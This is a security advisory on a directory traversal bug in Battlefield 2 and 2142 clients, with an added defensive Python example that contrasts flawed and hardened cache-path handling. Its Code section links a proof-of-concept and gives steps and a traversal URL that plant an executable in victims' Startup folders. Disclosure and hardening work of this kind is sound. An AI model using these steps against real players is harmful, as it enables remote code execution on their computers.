Source: http://aluigi.org/adv/bf2urlz-adv.txt

#######################################################################

                             Luigi Auriemma

Application:  Refractor 2 engine
Games:        Battlefield 2 <= 1.50 (aka 1.5.3153-802.0)
              http://www.battlefield.ea.com/battlefield/bf2/
              Battlefield 2142 <= 1.50 (aka 1.10.48.0)
              http://battlefield.ea.com/battlefield/bf2142/
              ...
              other games developed with the same engine could be
              vulnerable like Battlefield Heroes
Platforms:    Windows
Bug:          client URLs directory traversal
Exploitation: remote, versus clients
Date:         29 Jun 2010
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


The Battlefield series is one of the most famous and played series of
games deeply devoted to multiplayer gaming.
The series is developed by DICE (http://www.dice.se) and published by
Electronic Arts.


#######################################################################

======
2) Bug
======


Each BF2 and BF2142 server has some fields where the admin can specify
the links to files and images like the sponsor and community logo.
The sponsor logo is visible immediately when the client gets the list
of servers and selects the server with the mouse (one-click, not join),
while the second one is loaded when the client joins that server.

Other URLs also exist, like DemoDownloadURL, DemoIndexURL and
CustomMapsURL, that can be exploited when the client joins the malicious
server.

The client performs a very simple operation: it gets the URL and
downloads the file, saving it locally under its original name in the
following folder:

  C:\Documents and Settings\USER\My Documents\Battlefield 2\LogoCache\SERVER
  C:\Documents and Settings\USER\My Documents\Battlefield 2142\LogoCache\SERVER

where USER is the Windows account of the current user and SERVER is the
address of the web server, while LogoCache becomes HttpCache when the
URLs used are those for downloading demos and maps.

The vulnerability resides in the missing handling of the backslash char,
with the consequence that the name of the file will include the
classical directory traversal pattern, allowing a malicious server to
upload malicious executables on the clients.

Note that the loading of the URLs is automatic and it doesn't seem
possible to disable this feature.


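The following is an added example, not code from the advisory or from the Refractor 2 engine, written from the defender's side. It models the file-name derivation the advisory describes (everything after the host taken as the local name, backslashes untouched) next to a hardened version that keeps only the last URL segment, rejects both path separators and dot entries after percent-decoding, and then checks that the result still sits directly inside the per-server cache directory. A small `flag_server_urls` helper applies the same check to the URL fields the advisory lists, so a server record can be audited before the client fetches anything. `CACHE_ROOT`, the field names in `URL_FIELDS` and the sample server record are constructed for the example; the engine's real setting names are not given on the page.

```python
import re
from pathlib import PureWindowsPath
from typing import Dict, List, Optional
from urllib.parse import unquote, urlsplit

# Constructed cache root for the example; the advisory's real location is the
# per-user "My Documents\Battlefield 2\LogoCache" folder (USER is a placeholder).
CACHE_ROOT = PureWindowsPath(
    r"C:\Documents and Settings\USER\My Documents\Battlefield 2\LogoCache"
)

# Hypothetical field names for the server URLs the advisory says the client
# fetches automatically; the real setting names are not on the page.
URL_FIELDS = ("SponsorLogoURL", "CommunityLogoURL", "DemoDownloadURL",
              "DemoIndexURL", "CustomMapsURL")

# The traversal string quoted in the advisory, reused here only as test input.
MALICIOUS_URL = "http://SERVER/..\\..\\..\\..\\Start Menu\\Programs\\Startup\\owned.exe"

_HOST_RE = re.compile(r"[A-Za-z0-9.-]+")


def _collapse(path: PureWindowsPath) -> PureWindowsPath:
    """Resolve '.' and '..' lexically, as the Windows file API will when the path
    is opened. PureWindowsPath keeps them verbatim, so do it by hand."""
    out: List[str] = []
    for part in path.parts:
        if part == ".":
            continue
        if part == "..":
            if len(out) > 1:  # never pop the drive anchor
                out.pop()
            continue
        out.append(part)
    return PureWindowsPath(*out)


def naive_cache_path(url: str) -> PureWindowsPath:
    """The behaviour the advisory describes: the whole URL path is used as the
    file name, backslashes included, and joined under LogoCache\\SERVER."""
    parts = urlsplit(url)
    name = unquote(parts.path.lstrip("/"))
    return _collapse(CACHE_ROOT / (parts.hostname or "") / name)


def safe_cache_path(url: str) -> Optional[PureWindowsPath]:
    """Hardened derivation: return the local path the download may use, or None
    when the URL cannot be mapped to a plain file inside LogoCache\\SERVER."""
    parts = urlsplit(url)
    host = parts.hostname
    if parts.scheme not in ("http", "https") or not host or not _HOST_RE.fullmatch(host):
        return None
    # Only the last segment is the "original name"; decode before checking so
    # %2e%2e or %5c cannot smuggle a traversal past the filters below.
    name = unquote(parts.path.rsplit("/", 1)[-1])
    if (not name or name in (".", "..")
            or any(c in name for c in "\\/:")
            or any(ord(c) < 32 for c in name)):
        return None
    server_dir = CACHE_ROOT / host
    target = _collapse(server_dir / name)
    # Defence in depth: whatever passed the name checks must still be a direct
    # child of the server's own cache directory.
    if target.parent != server_dir:
        return None
    return target


def flag_server_urls(server_fields: Dict[str, str]) -> List[str]:
    """Names of URL fields whose download would not stay inside LogoCache\\SERVER."""
    return [f for f in URL_FIELDS
            if f in server_fields and safe_cache_path(server_fields[f]) is None]


# Constructed server record for the example, not real server output.
SAMPLE_SERVER = {
    "SponsorLogoURL": MALICIOUS_URL,
    "CommunityLogoURL": "http://SERVER/community.png",
    "DemoDownloadURL": "http://SERVER/demos/%2e%2e%5cowned.exe",
}

if __name__ == "__main__":
    print("naive :", naive_cache_path(MALICIOUS_URL))
    print("safe  :", safe_cache_path(MALICIOUS_URL))
    print("flagged fields:", flag_server_urls(SAMPLE_SERVER))
```

Running the block shows the naive derivation landing in the user's Startup folder with exactly the four `..` levels the advisory's string uses, while the hardened version refuses the same URL and the percent-encoded variant, and still accepts an ordinary logo URL.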
#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/onlywebs.zip
or
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14267.zip (bfonlywebs.zip)

- launch: onlywebs.exe c:\malicious_file.exe
- start the server launcher using the following string as sponsor and
  community logo URL:
  http://SERVER/..\..\..\..\Start Menu\Programs\Startup\owned.exe
- Save and Start the server
- launch the client and go to the multiplayer menu
- when the refreshing of the list has finished, select or join the
  malicious server
- now the file owned.exe will be available in the Startup folder of the
  client and will be executed at the next login or reboot

Note that the server may not be visible if you run it on the same
machine as the client (127.0.0.1); in that case use another
computer/VM (a server or a UDP datapipe on port 29900).


#######################################################################

======
4) Fix
======


No fix.


#######################################################################